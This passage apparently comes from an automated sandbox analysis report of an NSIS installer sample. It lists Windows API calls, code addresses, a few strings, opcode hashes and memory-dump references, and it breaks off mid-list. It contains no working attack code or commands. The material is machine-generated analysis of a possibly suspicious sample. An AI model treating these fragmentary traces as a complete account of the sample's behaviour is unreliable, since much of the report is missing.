                                                                                                                                                                                                                                      • Instruction ID: 0f69a0116b7f1ba106e871a719c63b07a343e19011b313dcb24ddb0bfcf4baff
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CE11862A80161299D7303B149D40A7762FCEF98764F56843FE986732C0E77C4CD286BD
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E39
                                                                                                                                                                                                                                      • GetMessagePos.USER32 ref: 00404E41
                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00404E5B
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404E6D
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404E93
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                      • String ID: f
                                                                                                                                                                                                                                      • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                      • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                                                                                                                                      • Instruction ID: 39da0b83e90955b658913b401ee9b713f1841a36fe6a8bad0240d4c742fa7cb5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E9018C72A0021DBADB00DBA4CD81FFEBBB8AF55710F10002BBA51B61C0C7B49A018BA4
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                                                                                                                                                                                                      • MulDiv.KERNEL32(00009E00,00000064,000C7F52), ref: 00402FDC
                                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 00402FEC
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00402FFC
                                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • verifying installer: %d%%, xrefs: 00402FE6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                      • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                      • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                      • Opcode ID: b8c438f2cb2d4d4e81e5e052a7d6c8fe5fe1304565937caf9c710faa28001cd8
                                                                                                                                                                                                                                      • Instruction ID: 6e758109fa8cded6d2ea51641b68a6ee4e1df044416b280c1a6c4c5bd582b841
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b8c438f2cb2d4d4e81e5e052a7d6c8fe5fe1304565937caf9c710faa28001cd8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B1014F7164020DABEF609F60DE4ABEA3B69FB00345F008039FA06B51D1DBB999559F58
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 00402A06
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2667972263-0
                                                                                                                                                                                                                                      • Opcode ID: 434c5aa2fa4661cc93f8b90accf7d486b4cf32dd195f8743aa915133d4078579
                                                                                                                                                                                                                                      • Instruction ID: f067c9a989b14af8d706ebefa04c24d1529afff37e35bb6a261b9bb9a52bb1c4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 434c5aa2fa4661cc93f8b90accf7d486b4cf32dd195f8743aa915133d4078579
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71318F71D01114BBCF216FA5CE49D9EBE79EF09364F14023AF550762E0CB794D429B98
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A7B
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00405A8F
                                                                                                                                                                                                                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405AA4
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00405AAE
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A5E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                      • API String ID: 3449924974-4083868402
                                                                                                                                                                                                                                      • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                                                                                                                                      • Instruction ID: 227e2837d2f0abbefd05ded2a29fab346f6aadb36d837cb996d7b4b6dfe3b4b1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A7010C71D00219EEDF009B90D948BEFBBB8EB04314F00413AD945B6181D77896488FE9
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                                                                                                                                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                                                                                                                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseEnum$DeleteValue
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1354259210-0
                                                                                                                                                                                                                                      • Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                                                                                                                                                                                                                                      • Instruction ID: cc42e232b24e5cb949d5075bafdc516cc04fbeb950a3b4618317dae0e566d145
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F3216B7150010ABBDF11AF90CE89EEF7B7DEB50384F100076F909B21E1D7B49E54AA68
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                                                                                                                                                                                      • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1849352358-0
                                                                                                                                                                                                                                      • Opcode ID: ac67a32c1c63d157babab1e4358f55078bade20f941efb87d7a14794f6aec10b
                                                                                                                                                                                                                                      • Instruction ID: 2ec253bf93b3ee2af7d9c2e9edfaee5893d577595a7c220e34a49f748079806b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac67a32c1c63d157babab1e4358f55078bade20f941efb87d7a14794f6aec10b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389D51DB98
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDC.USER32(?), ref: 00401E51
                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                                                                                                                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                                                                                                                                                                                        • Part of subcall function 00406544: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                                                                                                                                                                                                                                        • Part of subcall function 00406544: lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055A0,Completed,00000000), ref: 00406743
                                                                                                                                                                                                                                      • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2584051700-0
                                                                                                                                                                                                                                      • Opcode ID: 02c220045fa4ce37a47a4a385f421aa4e4c5bbcd39f6b6b3310c1ad1e6cfa2ab
                                                                                                                                                                                                                                      • Instruction ID: 4fb721614cfc657e7ae40bea064ac1047d1e810b67000393f6ef8132d91dbde4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 02c220045fa4ce37a47a4a385f421aa4e4c5bbcd39f6b6b3310c1ad1e6cfa2ab
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E101D471940651EFEB006BB4AE8ABEA3FB0AF15305F10497AF541B61E2CAB90404DB2C
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                      • String ID: !
                                                                                                                                                                                                                                      • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                      • Opcode ID: 63cd3b03ac6125a5c39657f4fd9aa1571fe8c5c2b1a809795ec118cdc527ca65
                                                                                                                                                                                                                                      • Instruction ID: 9cc957e5ccccb3d4664e0e2a58dae5c7f5d60dbdf5ff161d76b900271ba72f5e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 63cd3b03ac6125a5c39657f4fd9aa1571fe8c5c2b1a809795ec118cdc527ca65
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B9219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DB1
                                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 00404DBA
                                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,00423708), ref: 00404DCD
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                      • String ID: %u.%u%s%s
                                                                                                                                                                                                                                      • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                      • Opcode ID: cb7f8dab6708f5147347d1028f1fb4ade6693c058ac397d9bbab0fb1ec6fa22d
                                                                                                                                                                                                                                      • Instruction ID: e9142b657f1eeb4cf11744ba9db0a0194b5dde25e0a765d2a17d7598676c161e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cb7f8dab6708f5147347d1028f1fb4ade6693c058ac397d9bbab0fb1ec6fa22d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E911D8736041283BDB10666D9C45FAE3298DF81338F254237FA25F61D1D978D82182D8
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406507: lstrcpynW.KERNEL32(?,?,00000400,00403667,00429220,NSIS Error), ref: 00406514
                                                                                                                                                                                                                                        • Part of subcall function 00405E81: CharNextW.USER32(?,?,00425F10,?,00405EF5,00425F10,00425F10, 4Wu,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,75573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E8F
                                                                                                                                                                                                                                        • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405E94
                                                                                                                                                                                                                                        • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405EAC
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(00425F10,00000000,00425F10,00425F10, 4Wu,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,75573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F37
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(00425F10,00425F10,00425F10,00425F10,00425F10,00425F10,00000000,00425F10,00425F10, 4Wu,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,75573420,C:\Users\user\AppData\Local\Temp\), ref: 00405F47
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
